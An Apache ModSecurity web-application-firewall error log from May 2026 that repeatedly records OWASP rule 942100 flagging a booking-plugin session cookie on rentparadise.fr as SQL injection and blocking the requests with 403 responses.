[Tue May 12 03:58:31.472598 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJR7vMumyrWMfSu7q-2gAAANM"]
[Tue May 12 03:58:31.472799 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJR7vMumyrWMfSu7q-2gAAANM"]
[Tue May 12 03:58:32.308675 2026] [:error] [pid 1707624:tid 1707702] [client 74.7.243.217:46214] File does not exist: /home/ofcrysta/public_html/index.php, referer: http://of-crystal-lake.net/
[Tue May 12 03:58:32.620997 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKJR7vMumyrWMfSu7q-2gAAANM"]
[Tue May 12 03:58:33.285772 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/training"] [unique_id "agKJSbOxS7i6i_mT2NLfwwAAAEE"]
[Tue May 12 03:58:33.285981 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/training"] [unique_id "agKJSbOxS7i6i_mT2NLfwwAAAEE"]
[Tue May 12 03:58:33.286195 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJSbOxS7i6i_mT2NLfwwAAAEE"]
[Tue May 12 03:58:33.463581 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJSbvMumyrWMfSu7q-3AAAANM"]
[Tue May 12 03:58:33.463868 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJSbvMumyrWMfSu7q-3AAAANM"]
[Tue May 12 03:58:34.058864 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKJSbvMumyrWMfSu7q-3AAAANM"]
[Tue May 12 03:58:35.365162 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/user"] [unique_id "agKJS7OxS7i6i_mT2NLfxgAAAEE"]
[Tue May 12 03:58:35.365378 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/user"] [unique_id "agKJS7OxS7i6i_mT2NLfxgAAAEE"]
[Tue May 12 03:58:35.365600 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJS7OxS7i6i_mT2NLfxgAAAEE"]
[Tue May 12 03:58:35.582221 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJS7vMumyrWMfSu7q-3gAAANM"]
[Tue May 12 03:58:35.582435 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJS7vMumyrWMfSu7q-3gAAANM"]
[Tue May 12 03:58:35.822988 2026] [security2:error] [pid 1707624:tid 1707685] [client 43.156.117.41:39566] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/contact/"] [unique_id "agKJS7OxS7i6i_mT2NLfyAAAAEM"], referer: https://rixonephotography.com/?p=47
[Tue May 12 03:58:36.164025 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKJS7vMumyrWMfSu7q-3gAAANM"]
[Tue May 12 03:58:36.771083 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/users"] [unique_id "agKJTLOxS7i6i_mT2NLfygAAAEE"]
[Tue May 12 03:58:36.771291 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/users"] [unique_id "agKJTLOxS7i6i_mT2NLfygAAAEE"]
[Tue May 12 03:58:36.771506 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJTLOxS7i6i_mT2NLfygAAAEE"]
[Tue May 12 03:58:37.359079 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJTbvMumyrWMfSu7q-4AAAANM"]
[Tue May 12 03:58:37.359283 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJTbvMumyrWMfSu7q-4AAAANM"]
[Tue May 12 03:58:37.939906 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKJTbvMumyrWMfSu7q-4AAAANM"]
[Tue May 12 03:58:38.941812 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/vault"] [unique_id "agKJTrOxS7i6i_mT2NLfzgAAAEE"]
[Tue May 12 03:58:38.942018 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/vault"] [unique_id "agKJTrOxS7i6i_mT2NLfzgAAAEE"]
[Tue May 12 03:58:38.942236 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJTrOxS7i6i_mT2NLfzgAAAEE"]
[Tue May 12 03:58:39.309959 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJT7vMumyrWMfSu7q-4QAAANM"]
[Tue May 12 03:58:39.310167 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJT7vMumyrWMfSu7q-4QAAANM"]
[Tue May 12 03:58:39.892425 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKJT7vMumyrWMfSu7q-4QAAANM"]
[Tue May 12 03:58:40.123621 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/app"] [unique_id "agKJULOxS7i6i_mT2NLf0gAAAEE"]
[Tue May 12 03:58:40.123823 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/app"] [unique_id "agKJULOxS7i6i_mT2NLf0gAAAEE"]
[Tue May 12 03:58:40.124045 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJULOxS7i6i_mT2NLf0gAAAEE"]
[Tue May 12 03:58:40.385644 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJULvMumyrWMfSu7q-4wAAANM"]
[Tue May 12 03:58:40.385840 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJULvMumyrWMfSu7q-4wAAANM"]
[Tue May 12 03:58:40.970166 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKJULvMumyrWMfSu7q-4wAAANM"]
[Tue May 12 03:58:41.169825 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/content"] [unique_id "agKJUbOxS7i6i_mT2NLf0wAAAEE"]
[Tue May 12 03:58:41.170033 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/content"] [unique_id "agKJUbOxS7i6i_mT2NLf0wAAAEE"]
[Tue May 12 03:58:41.170256 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJUbOxS7i6i_mT2NLf0wAAAEE"]
